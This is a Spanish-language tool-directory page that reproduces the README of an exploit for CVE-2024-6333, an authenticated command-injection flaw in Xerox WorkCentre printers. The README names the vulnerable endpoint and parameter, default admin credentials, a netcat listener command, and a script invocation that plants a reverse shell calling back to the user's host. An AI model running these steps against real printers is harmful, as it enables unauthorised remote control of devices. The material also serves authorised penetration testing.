Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-6333 — Vulnerabilidad de ejecución remota de código autenticada en impresoras Xerox WorkCentre a través de la función Network Troubleshooting Log. | Kitploit
Herramientas/GitHubGitHub/0xqrx/cve-2024-6333
Seguridad de Sistemas EmbebidosExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de Hardware e IoT
GitHub0xqrx/cve-2024-6333

CVE-2024-6333

Vulnerabilidad de ejecución remota de código autenticada en impresoras Xerox WorkCentre a través de la función Network Troubleshooting Log.

Ver Repositorio
25hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-6333 - Ejecución remota de código autenticada en Xerox

Vulnerabilidad de ejecución remota de código autenticada en impresoras Xerox WorkCentre a través de la función de registro de diagnóstico de red.

Descripción

La funcionalidad de registro de diagnóstico de red (/properties/security/network_troubleshooting_log.php) no sanea el parámetro de servidor de destino (security.nwtroubleshoot.destination.server), lo que permite a un administrador autenticado inyectar comandos arbitrarios del sistema operativo. Cuando se inicia la captura del registro de red, la carga útil inyectada se ejecuta como un comando de shell, lo que resulta en ejecución remota de código.

Productos afectados

  • XEROX WorkCentre 6655 (probado en firmware 073.110.019.14200)
  • Varios otros modelos de impresoras Xerox (ver aviso)

Referencias

  • https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-code-execution-in-multiple-xerox-printers/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-6333

Requisitos

  • Python 3
  • Credenciales de administrador válidas en la impresora de destino
  • Acceso de red al destino

Instalación

pip install -r requirements.txt

Uso

Inicie un listener en su máquina:

nc -lvnp 8443

Ejecute el exploit:

python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443

Argumentos

ArgumentoObligatorioPor defectoDescripción
--targetSíURL de destino (p. ej., https://192.0.2.1)
--lhostSíDirección IP del listener
--lportNo8443Puerto del listener
--userNoadminNombre de usuario administrador
--passwordNo1111Contraseña del administrador
--proxyNoURL de proxy (p. ej., http://127.0.0.1:8080)

Cómo funciona

  1. Se autentica en la interfaz web de la impresora utilizando las credenciales proporcionadas
  2. Detiene cualquier sesión existente de registro de diagnóstico de red
  3. Inyecta una carga útil de reverse shell en el campo de servidor de destino
  4. Activa la captura del registro de red, ejecutando la carga útil
  5. Espera 30 segundos y luego envía un comando de limpieza/detención

Aviso legal

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal.

Descargar herramienta